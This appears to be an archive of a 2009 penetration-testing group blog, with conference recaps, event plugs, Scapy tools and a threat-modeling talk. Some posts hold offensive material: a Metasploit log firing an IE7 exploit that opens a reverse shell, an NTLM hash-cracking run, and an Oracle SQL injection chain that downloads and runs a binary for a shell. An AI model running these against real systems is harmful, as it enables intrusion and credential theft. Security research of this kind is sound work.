Friday, February 27, 2009

Top 10 Web Hacking Techniques

Jeremiah Grossman just posted (well...awhile ago) the official Top Ten Web Hacking Techniques.

I want to give a shout out to dean who did a great post on ActiveX repurposing or "0wning the client without an exploit" back in August. ActiveX repurposing is #9 in the Top 10, and #41 (blog post linked there) on the big list. Unfortunately He nor c0 was specifically mentioned in the top10 even though it was mentioned in the big list.

...maybe next year.

Wednesday, February 25, 2009

Traceroute Collector/ Aggregator for Scapy

One of the main reasons I picked up Scapy is for the graphs. I have never been a visual guy, so Scapy is like magic when it comes to network mapping let alone network traffic manipulation. Well, I really liked Scapy's basic graphing features, but when you have a large set of hosts to trace route, it gets annoying popping up the graphs with the black hole hosts. This gets true when the hosts paths to the target network. Another thing that I wanted is the ability to group endpoints.

It took me about a week along with other work to get everything down (note last weeks post), but I think I managed to get a basic implementation. I set it up so I can perform a number of individiual traceroute operations, and then drop them in a collector of sorts. Then when all the traceroutes are complete, then you can generate graphs with grouped endpoints and then the blackholes are ommitted. I borrowed some code from Philippe's implementation of TracerouteResult.make_graph. There is alot of extra code in TracerouteCollector class because I was tried a few different ways of forming the graph. I eventually got so frustrated that I create a basic traceroute path string and parse that result. I attempted merging TracerouteResults as well as maintaining other stuff, but it got complex quick, which lead to more frustration.

Like I said in the end, I gave up on the native traceroute result object and built my own path string. Depending on whether the traceroute found the endpoint it ends up in a completed path or incompleted path bin. When I build the graph, I go through and group the results based on the path taken and the endpoint was reached. I also go through and enumerate all the ASNs. However, when nodes are grouped together, the ASN is based off the first IP address in the grouping. Otherwise, there will be extraneous nodes in the image. While I don't do this, someone could just prune the ASN results, but I have another project that I need to start on, so I did not get around to that.
I also have code that will write the traceroute trace, the graph, and then read in a traceroute trace from file. This might be useful if you want to do something else or save the traceroute for use later.

The class is meant to augment Scapy functionality so you would include it along with your Scapy includes:

# from scapy.all is imported in the trace_route_combine module
from trace_route_combine import *
t = TracerouteCollection()
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
x = traceroute("", maxttl=18, dport=80)
# now to create the graph
# or get the graph string
gs = t.build_graph()
# get paths to all the trace routed hosts
# x> is a down host and => is an up host
paths = t.get_paths_to_hosts()

As usual the code is open source and licensed under GPL. If you like it let me know, if you hate it let me know too. This is experimental but usable code.


Saturday, February 21, 2009

Modern Social Engineering Webcast

Figured I'd pimp out what should be a really good webcast by Chris Nickerson and Mike Murray. They will also be doing a Social Engineering Course at the next ChicagoCon.


Webcast: Modern Social Engineering - A Vital Component of Pen Testing

eh-net_tv.jpgThe world of Information Security is changing. Budgets are tighter, attacks are more sophisticated, and the corporate network is no longer the low hanging fruit. That leaves web-enabled applications as the vector-du-jour, but that well is quickly drying up for organized crime as well. As they creep up the OSI Model looking for easier ways to steal your corporate assets, they are quickly making their way up the stack to the unspoken 8th layer, the end user. So what is the next step in the never-ending escalation of this cyber war?

To find out, we must do as Sun Tzu taught. "Think like our enemy!" That is, after all, the primary tenet of penetration testing AKA ethical hacking, isn't it? After years of hardening physical systems, networks, OSs, and applications, we have now come full circle to a new dawn of attack. People are now the target of the advanced hacker, and the cross-hairs are focused squarely on their foreheads... literally. It is only a matter of time before corporations feel the pain of wetware hacking requiring a new approach to testing and defense.

Join world-renowned social engineers, Chris Nickerson of TruTV's Tiger Team and noted expert and international speaker, Mike Murray, as they prepare you for the future of pen testing. This webcast on Tuesday March 10, 2009 at 11:00 CST is your primer to the world of "Modern Social Engineering."


New Oracle SQLI Coverage

MC recently added some recent Oracle SQLI exploits by Sh2kerr of Digital Security Research Group which is a great site if you are into Oracle stuff. Their Different ways to guess Oracle SIDs paper is really good.

Info here

adds coverage for:

Oct 08 CPU


They also published
droptable_trigger (MDSYS.SDO_TOPO_DROP_FTBL Trigger)

which is coverage for:

Jan 2009 CPU

all four exploits are in trunk. Enjoy!

Friday, February 20, 2009

Response to How to Choose a Pen Tester

So a response to "How to Choose a Pen Tester"

Let me start with that I agree with the core of Steve's argument. Yes if I pay someone to come in and do "anything" on my network I want to be able to trust them not steal info, plant trojans, or air my dirty laundry out on the net when they are done.

I don't disagree with that.


A few comments not sure they are quite counterpoints

1. I personally don't see a big prevalence of pentest shops doing pentests and posting customer data on the net in any form. If there are examples show me. He mentions in 6 months he heard ONE story about someone that did that and didn't provide a link...ummm ok. Is it believable that it does happen/has happened/could happen?...yes. That every pentest shop is doing it (except his which is really the point of the post)... doubtful. Its not a smart business decision to 1) as a company do that or 2) allow your testers to do that on their personal blogs.

2. As David Hull mentioned, what is the problem with talking about a pentest as long as the customer cant be derived from the post/presentation/email or there isnt enough actionable information to conduct the attack? If companyX was vulnerable to SQLI 6 months ago and I went in and found it using some creative method and i decided to share that experience on my blog or at a conference what is the problem with that? The company isn't vulnerable any more and if I had to figure out some new method of doing "whatever" unless it was explicitly in the contract not to share "new pentest methods" aren't those mine to share as a I see fit? It helps the community when others talk about things they have seen on a pentest even if its just to make the other guy feel a tad bit better than someone else lives in jacked up network hell. Even though I always get alot more out of peoples posts about their pentests.

3. I realize that Steve proposes you do a scorecard but really....trustworthiness over competence? Why on earth would you ever even consider doing business with someone you didn't trust? I don't see how anyone with half a brain would put themselves in the position of...hmmm do I choose the trustworthy CEH or the untrustworthy l33t ass hacker....ummm NEITHER! You pick a company that hires intelligent, competent, trustworthy, and the rest of the stuff on his scorecard people. Is there really that many companies that are that piss poor that even make it past a scoping call? and more importantly do the decision makers for choosing the testers not have the ability to pick the good from the bad?

I should insert a shameless plug here but I don't think its necessary :-)

MS09_002 Memory Corruption Update

CG just pushed the code to the Metasploit trunk so go run 'svn update' and enjoy. Any feedback would be good. I'll writeup a little something on it and how the vuln is triggered too when I get a chance.

dean de beer

Thursday, February 19, 2009

Quick Scapy Tutorial for Extending Tools: Batch Tcpping

Originally posted from here.

Like every good hacker with nothing to do, I have my hand in someone elses cookie jar learning how to do something cool. This week I took some time to learn how-to use Scapy 2.0, and I wrote a script to perform a batch TCP Ping. I am sure someone will say in the back of their mind...."there is this tool called nmap." I my response, yes I know and everyone uses that tool, I want to fly under the radar not into it. I am not saying what I did is guaranteeing I am not in that category, but its a step away from the crowd.

I wanted to control some of the data in the TCP segment (e.g. payload, sequence number, dport, sport, etc.), and I wanted something to tell me *waves hands in circles* if there was possibly an IPS or Firewall in my way that would be nice too. Basically, all this script does for the time being is takes a file to be expanded/reconned, and tcp-pings them with some randomized settings in the TCP Layer. Not novel and innovative, but a good learning exercise. There are a couple of other directions that I would like to take this, but for the time being, I figure I would share what I have and what I learned. This is for Scapy 2.0+, there was a major software change between the 2 releases. I am going to basically list the interesting parts of my code and explain what I am doing. I learn by example, and in this fast furious world of "teh netz", I am sure others do too. I have been told my posts are a tad lengthy, so I will just hit the highlights.

I know there is logic that I can put in the script to make it a little smarter and faster, but for now, it can serve as a good tutorial for others. Apparently, Google Blogger might be distorting the code a bit, but it can be seen in it's full Pythonic whitespaced beauty here

Step 1. Importing Scapy into the script and silencing the verbosity:

from scapy.all import *
# default conf.verbose = 2
conf.verbose = 0

Step 2. Create my Tcp-Ping Packet and send it along the way

def tcp_ping_host(host, port=80, ppayload=None, to=1):
# host is the ip-address string
# sport is the dst-port to scan from
# seq number is current seq number of the packet
# if we want to mix it up and add arbtrary payloads
# simply make ppayload into a string, or a RandString(size, chars)
p = IP(dst=host)/TCP(dport=port, sport=RandShort(), seq=RandShort())
if ppayload:
p.payload = str(ppayload)
pOpen = False
hIPS = False
# send a single packet and wait for to*1 Seconds for a response
a = sr1(p, timeout=to)
# if the answer,a, is None, the host did not respond
# if a is a response, and it is ICMP and type == 1
# then the host is unreachable, port unreachable indicates
# there may be a host there (UDP) type scan
# a.haslayer(ICMP) checks if the packet has an ICMP layer
# a.getlayer(ICMP) gets the instance of the layer and then
# the fields for that layer can be referenced, e.g.
# a.getlayer(ICMP).type lets us access the type field
if a is None:
return a, False, False, False
elif a.haslayer(ICMP) and a.getlayer(ICMP).code != 3\
and a.getlayer(ICMP).type != 3:
return a, False, False, False
# 0x12 are the Syn-Ack in the flag fields of the TCP Segment
pOpen = a.haslayer(TCP) and (a.getlayer(TCP).flags == 0x12)
# try with a bad-sum
# some IPS/IDS/Firewalls respond to all packets, so lets mix
# it up and shoot a random/bad checksum at them
# to do this we will take p and modify the chksum to be a random
# short value and send it along (Idea was grabbed from nmap docs)
t = p.getlayer(TCP)
t.chksum = RandShort()
b = sr1(p, timeout=to)
# if we get a reply, its safe to say the host is FAIL
# or its a security device.
if not b is None:
hIPS = True
# fini. hope it was as fun for you as it was for mw.
# Spent all day in the coffee shop on this one, yay!
return a, True, hIPS, pOpen

There is some other functionality hidden away in the script like scanning a set of ports randomly, scanning hosts in random order, resuming a scan (or adding hosts to a do not scan list, etc.), but I have not tested all that stuff, but its there. I also posted some code a few light years ago on OpenRCE about using Scapy. Anyway enough talk, time for bed. Hope this was helpful to some. Have a good weekend.

As always here is my code:

BlackHat Day 1 Writeup

As promised...

The keynote was pretty good, there is lots of buzz about it on the net. BlackHat was nice enough to post the video:

Like usual it seems I picked the wrong least for my first talk... There is tons of buzz about the SSL talk which I did not attend. But will be watching tomorrow since BH was nice enough to share it as well.

Instead I went to Travis Goodspeed's Reversing and Exploiting Wireless Sensors Travis is amazing at hardware hacking. I didn't take alot of notes on the talk because most of it was over my head but for me the big takeaway is that just because things aren't PC's doesn't mean they aren't on the network and certainly doesn't mean they aren't pwnable. Travis basically demonstrated the various ways to defeat two popular micro controllers which could lead to all kinds of fun things if you have zigbee network in your infrastructure .

I left the Vista Security Internals one, too much Windows code for my brain to handle. The jist was that there were some major changes to LSASS with Vista SP1 that would make stealing password hashes out of memory via dll injection much much harder to do. If someone stayed for the whole thing I'd appreciate a wrap up of what the dealio was and if it has been defeated yet. I went over the OS X talk but he had already talked about whatever it was about and was doing demos.

After lunch I went to the Attacking Intel Trusted Execution Technology talk. very cool stuff. I'll skip my "jist of the talk" you can just watch it for yourself. Bottom line lots of Bios and computers are completely backdoorable and all your trusted computer platform stuff wont even know...very cool stuff.

Michael Sutton's A Wolf in Sheep's Clothing: The Dangers of Persistent Web Browser Storage covered four big issues; HTTP Cookies, Flash Local Shared Objects, Google Gears, and HTML 5.

Most notable was Google Gears, now just Gears, and HTML5 which allows for client side relational databases. Very interesting attack vectors start to come into play where with the client side db all in need is an XSS on any site to read database out of the client side db. The issues with discovering tables names and structure are gone because the attacker would have aready have copy of their own database to discover that, all the attacker would need to do is determine the username for the victim.

Adam Laurie talked about Satellite Hacking for Fun and Profit. I caught the tail end of the talk but it was also very interesting. Rather than butcher a synopsis, you can watch it. But in short, capturing TCP & UDP as well as other fun unlisted channels over your home satellite box.

Also...Media Archives are up:


ChicagoCon 2009s is coming up!

Don has published info ChicagoCon 2009s. The Social Engineering training by Chris Nickerson and Mike Murray should be awesome and the Con portion always has really great speakers. So if you are in the Chicago area you should definitely check it out.

ChicagoCon 2009s
Training: May 4 - 8
Conference: May 8 - 9

This is a small regional event that has grown organically. It will only continue to be successful with your help. Please help spread the word by mouth, blog, banner (feel free to steal pics from EH-Net), email... all is appreciated.

Just a quick announcement about the upcoming spring edition of ChicagoCon. As you know, we have completely separated the training from the conference. It was such a success, that we are continuing with that model. Registration is now open for all courses and the Ethical Hacking Conference. If you are taking one of our training courses, then the Conference is included in the price of your class. If not, Conference Only Tickets are just $100.

Training Details May 4 - 8

All courses are 5 days in length except CISSP which is 7. All courses feature most meals, computers are provided, all exams are held on site and a FREE ticket to the Ethical Hacking Conference. We are now offering a $200 Discount Off Training for Early Registration. Discount ends March 15, 2009! Here's the lineup (See Details on the site including pricing):

* Exclusive Course Offering: Social Engineering Master Class by Chris Nickerson (TruTV's Tiger Team) & Mike Murray (Expert and International Speaker)

* Popular Cert Classes by Training Camp
- Fundamentals with Network+ & Security+

* Adv. Tech. Courses by InfoSec Institute
- Expert Pen Testing (CEPT)
- Reverse Engineering Malware (CREA)
- Web App Security (CASS)

Ethical Hacking Conference Details May 8 - 9

Only 250 Conference Only Tickets are being made available, so get yours NOW!! Talks by Chris Gates, Craig Heffner, Jack Koziol, Ryan Linn, Mike Murray, Chris Nickerson, Tim Rosenberg, Andrew Whitaker, and many more.

- Keynotes & Technical Presentations
- Capture the Flag with White Wolf Security
- "The Doctor Is In" Career Counseling
- Lock Picking 101
- Resumania
- Evening Entertainment

Subject to change, so please keep an eye on the site. Specifics and schedules will be posted in the coming weeks Right HERE!


Wednesday, February 18, 2009

BlackHat Day 1...writeup coming soon

Yeah I fully intended to do my day 1 write up, but Lost was on, sorry...

But I do have notes and if i'm motivated in the morning will do it on the train in for Day 2.

Couple of quick highlights with more tomorrow.

Travis Goodspeed is a hardware ninja and all zigbee are belong to Travis.

Michael Sutton with client side SQLI is the new hotness. Go Google Gears!

Adam Laurie is still the RFID man! and now I have to buy satellite gear because his commercial satellite hacking was the shizzle!

I got to see HD Moore in the flesh...thats always cool.

Lunch was way better than last year

some gripes...

no free BlackHat T-shirt! what the F**k!!! for $1200+ people deserve their free BlackHat T-shirt and shouldn't have to pay 20 bucks for one. man, that really started me off on a downer for the day

no phone signal in the con area so no twitter :-( ...yeah i don't have an iphone so i couldn't just connect to the wifi because i have verizon and they border on cruel and unusual punishment.

Day 2

looking forward to Valsmith and Collin's talk and David Litchfield's talk.

MS09_002 Memory Corruption Exploit

Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to
[*] Command shell session 1 opened ( ->
dean de beer

UT SSE Presentation: Introduction to Software Security and Threat Modeling

Last Friday, I had the opportunity to introduce some aspects of software security and threat modeling to the UT Student Software Engineering Group, which included a mix of undergraduate and graduate students as well as faculty. The presentation format was more of an open discussion where I would answer questions as I spoke, and we would engage in conversation about the topic of the question. I enjoy this format, because the presentation evolves with the group, and not the presenter. The presentation is up on the site and located here.

During the course of the presentation, several interesting questions came up that I was not prepared to answer completely. Additionally, I feel it would be good to share the questions and my thoughts with others after I researched them. One question was about the economics of software security and whether or not the security integrated into the software development life cycle is worth the effort. Another question posed wanted to know if threat modeling and software security were effective in reducing vulnerabilities and other unwanted issues such as bugs. The final question was specific to software developers and things besides that can be done besides writing good code. There are a number of great references on the topic of software security, and my comments may only scratch the surface. If you want to learn more, I have provided some URLs and books I have used to get you started. As a starting point, I used a presentation given by Chris Peterson who presented on Microsoft Windows 7 Security at XCon put on by XFocus [1].

The first topic that came up during the presentation concerned metrics and how security helps improve the software engineering process. Additionally, there were questions about cost savings, specifically does security make the software engineering process more expensive. My answer to these questions depends.

First off, security is one ingredient to the software engineering process. If everything in the process is done correctly and security is integrated into it, as the SDL describes, the over time I see the cost of the software lower than the without security. Cost can be driven down in a number of ways. In 2002, RTI published a report about poor testing standards and the impact on the economy [2]. They published costs due to poor QA and testing and then potential savings. Given this fact, lets look at QA and testing. These are some of the hardest and most laborious tasks in the software engineering process, outside of the actual development. When tools such as threat modeling or fuzzing are employed these costs can be lowered. Threat modeling can be used to identify how the application will be used and abused (e.g., test cases and abuse cases) along with identifying more sensitive and critical areas in the software or areas in the software where automated testing can be performed. One inherent benefit is identifying and performing testing in areas that need it most, rather than testing the entire product equally.

Automated testing frameworks can also be developed or augmented to meet the automated testing needs of the project. From the TM, test patterns and cases can arise, and these can then be fed into the testing framework. This aspect helps save money because machine clock cycles are cheaper than human man-hours. Additionally, the framework and test patterns can be kept in a library for future use, so the fuzzing investment can be reused and even built into other projects. So in this case there may be a higher overhead due to threat modeling and automated security testing framework development, but there is also a potential savings over the life of the project, and other projects as well. As far as money or cost savings from these activities, I do not have figures. But a question did arise about the cost of a security breach, and I found a figure that was about $202 per record [3,4]. But there is no comparison or metric for money saved. There are other places where money can be saved like a streamlined patching process or reliability as a result of security, but for brevity we will continue on to the other questions that arose.

While my first issue infers better security is possible, it does not prove it with empirical data. The second discussion we had was about improved product security. Since Microsoft began using the SDL in 2002, they have seen a sharp decrease in the number of critical vulnerabilities in their operating systems [5]. The following figure is excerpted from H1 2008 Desktop OS Vendor Report.

Image From H1 2008 Desktop OS Vendor Report p. 13, Vulnerabilities By Product, Severity (Reduced Linux Configuration)

Image From H1 2008 Desktop OS Vendor Report p. 13, Vulnerabilities By Product, Severity (Reduced Linux Configuration)

The figure shows vulnerabilities (critical, medium, and low) by OS, comparing Windows Vista, Windows XP SP2, Mac OS X, Ubuntu, and RHEL. The figure shows Windows Vista with much fewer vulnerabilities than other desktop platforms. Additionally, on Microsoft’s Malware Protection Center Site, there is a graph on page 15 of [6], which shows the infection rates of each of their operating system platforms with Microsoft Vista touting much less than most of the others. The only OS with fewer infections is Microsoft Server 2003 SP2, which could be for more than one reason:1) it has fewer deployments, 2) it is not used for everyday activities that expose it to threats seen by consumer desktops (e.g. no changes to default security settings), or 3) its more secure. Microsoft’s Vista OS is one of the flagship products for the SDL process. When Microsoft XP and Microsoft Vista are compared in vulnerabilities and infection rates, a conclusion can be drawn that a successful SDL can help build a successfully secure product.

Another issue that came up is the insider threat and how to model them, more specifically the byzantine user who has some motive to do harm. Insider threats are the most expensive and dangerous aspects of a security system. In these cases, threat modeling can help identify critical assets, data, systems, etc. and identify mitigation strategies. First of all the Principle of Least privilege should be used. This can help knock down most significant risks, because users are only privileged to do the role they fill. For example, a banking clerk should not be given administrative access to their host. Technical and human checks and balances (e.g. controls) should be integrated into architectures, designs, and implementations. The controls might require multiple authoritative personnel to sign-in and allow critical changes. The controls might come in the form of policy, but given a rogue user with ulterior motives may circumvent the system to meet their own objectives, so logging and review should also be heavily integrated into the system. As an example, any work a network engineer does should be checked by a peer to prevent malicious or catastrophic events. In one case, a major corporation was spared millions by a review of server management scripts [7]. However, their security policies should be heavily scrutinized and rewritten. There are as many ways to circumvent security issues as there are to mitigate them. TM will help assess the risk and help place a value of how much mitigation is necessary and where the mitigation needs to be employed to thwart these types of attackers. In any environment, Defense-in-Depth is key in ensuring overlapping security coverage and positive failure. Like software engineering, there is no silver bullet.

One final topic that came up in the presentation was technology. Specifically what else is there besides code security. On the developer side of the fence, there are a number of exercises that can be performed to ensure code security, which might include code analysis (e.g. static or dynamic analysis), code reviews, policies regarding unsafe APIs, input validation, code signing and obfuscation, etc from development up to deployment of the product. There are also technologies and policies that can be used to supplement code security when the software is in production. As I mentioned Defense-in-Depth is the key to a successful security plan. Technologies and policies need to be chosen to accommodate and secure software products. For example, when a product is RTM, all debugging symbols should be stripped and stack checking should be enabled to prevent arbitrary control from stack overflows. The deployment platform should be secure by default, meaning features such as DEP and memory randomization are enabled. Depending on the deployment scenario, other steps may be taken. If this is a large IT project, the systems involved can be reviewed for secure configuration guidelines, network technologies for logging and access control can be used, etc. There is an entire laundry list of things that can be done out side of the code level.

Security is all about engineering. There are a vast number of things that can be done to ensure a successful and product development cycle. I feel that a TM is the keystone of this success. It helps everyone understand the goals of the product, each component, leading up to identifying and understanding how to contain or handle threats. I equate threat models for software engineers to a battle plan for war fighters. The threat model provides insight into the security landscape, it helps flush out logistical and strategic details, and everyone should come out with an understanding of what they need to do to make the project a success. I could go on about this topic, because I love to discuss this and educate others about security. I have been doing this for a while, and I really do have much to share, but given this has all been said at one time or another, I will simply present some links of interest.

Links to OWASP regarding information and application security:


OWASP Security Principles (for Developers and Designers) (not just for software folks)

OWASP How-to Articles

Microsoft SDL and Software Security Information:

Microsoft’s SDL Home Page

Microsoft’s Threat Modeling Tool

Microsoft’s Security Intelligence Reports and Malware Protection Group

Here are just a few books I have read or keep available in my library:

Coding Standards and SDL Practices

M. Howard and D. LeBlanc, Writing Secure Code, ed. 2. Redmond: Microsoft Press, 2003.

M. Howard and S. Lipner, The Security Development Lifecycle. Redmond: Microsoft Press, 2006.

G. McGraw, Software Security Building Security In. Upper Saddle River: Addison Wesley, 2006.

Software Testing and Assessment

G. McGraw and G. Hoglund, Exploiting Software How to Break Code. Boston: Addison Wesley, 2003.

M. Sutton, A. Green, and P. Amini, Fuzzing Brute Force Vulnerability Discovery. Upper Saddle River: Addison Wesley, 2007.

M. Down, J. McDonald, and J. Shuh, The Art of Software Security Assessment Identifying and Preventing Vulnerabilities. Upper Saddle River: Addison Wesley, 2007.


1. C. Peterson. “Windows 7 Security Overview.” XCon2008 XFocus Information Security Conference. November, 2008.

2. RTI. “Planning Report 02-3: The Economic Impacts of Inadequate Infrastructure for Software Testing (2009).” NIST [Online], Available,

3. Walt. “Cost of a Security Breach (2009).” PCI DSS News and Information [Online]. Available,

4. “2008 Annual Study: Cost of a Data Breach (2009).” Ponemon Institute. [Online]. Available,

5. J. Jones, H1 2008 Desktop OS Vendor Report (2009). [Online], Available,

6. Microsoft Security Intelligence Report volume 5 (January – June 2008) (2009). Microsoft [Online]. Available,

7. K. Poulsen. “Fannie Mae Logic Bomb Would Have Caused Weeklong Shutdown (2009).” Wired [Online], Available,

Post originates from here.

Saturday, February 14, 2009

Dictionary Based Rainbow Tables with Dr-crack

After Matt Weir's shmoocon talk I got motivated to generate and play with some dictionary based rainbow tables with Dr-crack. Why... I don't know, I pass the hash for everything now, and

"Dictionary based rainbow tables, such as those generated by drcrack, on the other hand allow you to create pre-generated hash tables based on dictionary words and common word mangling rules, such as "P@ssword12".

Plus it's less "magic" when I say I cracked the passwords versus just passing the hash, passing the hash still seems to be magic to alot of people. Plus, as Matt Carpenter pointed out to me, you cant log into Terminal Services/RDP with a hash :-)

So I went to the website and downloaded the .tar, extracted, and typed make all and got the following error.

cg@notBT:~/evil/drcrack/shmoocon_submit$ make all make: *** No rule to make target `Public.o', needed by `drtgen'. Stop.

The issue ended up being public.cpp which needed to be named Public.cpp. rename the file and you should be good to go.

You can run ./dr_rules to alter either the basic_rules file or the keyboard_rules file but to get started I just used the default keyboard rules, dictionary, and table that they generated.

I changed a password in a VM to a keyboard combo (but still a 10 character password) that I was sure was in the dictionary and dumped the hashes.

then I ran the tool: (usage was here:

cg@notBT:~/evil/drcrack/shmoocon_submit$ ./drcrack -d /home/cg/evil/drcrack/keyboard_basic/keyboard_map.cfg -h 0D757AD173D2FC249CE19364FD64C8EC
Processing mangling rules
special=[>!@#$%^&*()_+\-=?.,/\\":; ] size=26
lower=[abcdefghijklmnopqrstuvwxyz] size=26
number=[0123456789] size=10
Reading in the dictionary
Dictionary Size = 658
Calculating rule and index size
Figuring out Rule Size
Index Size for rule 0 is=658
Index Size for rule 1 is=432964
Index Size for rule 2 is=284890312
the total Size=285323934
reading chunk...
83888 bytes read, disk access time: 0.00 s
verifying the file...
searching for 1 hash...
cryptanalysis time: 6.93 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.25 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.38 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.12 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.04 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.03 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.14 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.17 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.02 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.01 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.06 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.17 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.70 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.05 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.05 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.22 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.03 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
plaintext of 0d757ad173d2fc249ce19364fd64c8ec is qwertyuiop
cryptanalysis time: 0.03 s

plaintext found: 1 of 1 (100.00%)
total disk access time: 0.00 s
total cryptanalysis time: 9.40 s
total chain walk step: 2876401
total false alarm: 1451
total chain walk step due to false alarm: 1253346

0d757ad173d2fc249ce19364fd64c8ec qwertyuiop hex:71776572747975696f70

Overall not bad, in less than 10 seconds I found a password that would have been in a pretty big NTLM table otherwise.

I'm sure more posts are forthcoming...

Friday, February 13, 2009

BlackHat D.C. picks

still recovering from shoulder surgery and have been checking out the BlackHat D.C Agenda. Unlike last year for BlackHat USA I actually have a ticket this year so its not just wishful thinking. So here's what I plan on checking out.

Day 1

10:00 - 11:15
Reversing and Exploiting Wireless Sensors
Travis Goodspeed

Toss up between

11:30 - 12:45
Windows Vista Security Internals
Michael Muckin


11:30 - 12:45
Let Your Mach-0 Fly
Vincenzo Iozzo

will probably decide on which one has seats that dont suck.

13:45- 15:00
Attacking Intel® Trusted Execution Technology
Joanna Rutkowska and Rafal Wojtczuk

15:15 - 16:30
A Wolf in Sheep's Clothing: The Dangers of Persistent Web Browser Storage
Michael Sutton

16:45 - 18:00
SQL Server Anti-Forensics
Cesar Cerrudo

Day 2

09:00 - 09:50
Dissecting Web Attacks
Val Smith and Colin Ames

10:00 - 11:15
dont know yet, probably the flash one

11:30 - 12:45
Defending Your DNS in a Post-Kaminsky World
Paul Wouters

13:45 - 15:00
dont know yet, probably TOR one

15:15 - 16:30
The Forensic Investigation of a Compromised Oracle Database Server

David Litchfield

16:45 - 18:00
Snort My Memory
Peter Silberman

Is there a talk better than what I picked? let me know!

Monday, February 9, 2009

Shmoo & the 'con within a con'

DC is a blast as always! Hanging and catching up with everyone is always a good time. I met a bunch of folks for the first time too, put names to faces and saw a lot of old friends too.

I'm not going to give a review or opinion of any of the presentations as cg has already done that. I really did not attend that many either to be honest. :) It's becoming more and more apparent to me that the true value of the cons are in the opportunity to network and bounce ideas off your peers.

Walking around I saw small clusters of people everywhere. All talking and sharing ideas and information. A group of us all got together in on of the hotel rooms. A few of the guys broke out their laptops and showed some research and work that by far was the coolest stuff I saw the whole weekend. cg redid his Oracle stuff and it was really cool to brainstorm and come up with ideas to extend the apps, concepts and P0C's that were presented by everyone.

I'm sure that we were not the only guys that were doing this too. These 'cons within cons' are, in my view, a great byproduct of the con itself and I'm looking forward to next one for that reason alone.
dean de beer

Sunday, February 8, 2009

Oracle FTP Script Write/Binary Download/Execute via Oracle Packages Video

Metasploit Auxiliary module for Oracle FTP Script Write/Binary Download/Execute via Oracle Packages.

As DBA (yea for SQLI) we use UTL_FILE to write out our FTP download script, using DBMS_SCHEDULER we create a job to run the script to download our binary and create a 2nd job to execute our binary and get our meterpreter shell. Oracle...Unbreakable.

I got the "how to do it" from Red-Database-Security

check MC's video (requires java) on getting those DBA privs on an 11g box.

No code yet unless you email me and say you'll actually test it. Right now its in the "works for me" status but if you want to try it out on some other Oracle versions give me a shout. It wont work on 9 but should work on 10 & 11.

Metasploit Auxiliary module for Oracle FTP Script Write/Binary Download/Execute via Oracle Packages from carnal0wnage on Vimeo.

Shmoocon Day 2 & 3

Shmoocon is over, according to twitter good times were had by all.

I missed a few talks I wanted to see due to it being too crowded in alot of them and also me not getting my butt in gear on Saturday morning.

So what I did catch.

Zero_Chaos' talk on 802.11 ObgYn or "Spread Your Spectrum" which was about his updated drivers to open up some wifi ranges that were only not accessible because of software driver limitations. very good talk.

Enno Rey and Daniel Mende's talk on All your packets are belong to us - Attacking backbone technologies was interesting but I had to leave par tof the way through.

I unfortunately missed Dave Kennedy's talk on Fast-track that I really wanted to see.

Sunday morning I caught Matt Weir's Enough with the Insanity: Dictionary Based Rainbow Tables. He talked about optimizing the rainbow crack code to be able to do some "smart" rainbow table generation. Tool site: & blog

Lastly Chris Padget completely demoralized Electronic Drivers License and US Passport Cards, I mean slapped around, spanked, sent to bed without dinner. Great presentation. Really layed out all the reason the technology is wrong for what they are trying to do and how really really wrong the implementation is...ouch.

On other fronts. Dean was there so its always good to hang with Dean. I redid the Oracle talk in my room to some people and got some really good feedback and some things to work on for future functionality.

I also got to put tons of faces to names so shout outs to all the people that I met at shmoo for the first time (too many to list).

Saturday, February 7, 2009

ShmooCon Day 1 wrap up

So quick wrap up on Day 1.

The only talks I caught were the end of the smart key one, which seemed cool and the Watching the Watchers one by the cadets. It was good, not overly technical, but still good.

Did lots of chatting with old friends and met some new ones which is always good. Its always nice to turn names into faces.

ShmooCon Firetalk on Attacking Oracle with the Metasploit Framework went pretty good, its hard to look at everyone when you are in a circle and there was no mic so I pretty much had no voice by the end of it but I think it went pretty good and I got some good feedback and questions from some people in the audience after. The demo video is posted.

